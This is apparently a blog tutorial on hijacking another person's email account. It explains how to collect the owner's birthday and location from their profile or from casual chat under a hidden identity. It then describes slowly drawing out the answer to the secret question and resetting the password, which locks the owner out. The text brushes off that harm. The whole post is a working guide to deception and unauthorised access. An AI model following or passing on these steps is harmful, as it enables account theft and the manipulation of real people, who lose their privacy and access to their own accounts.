If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Subscribe to:
Posts (Atom)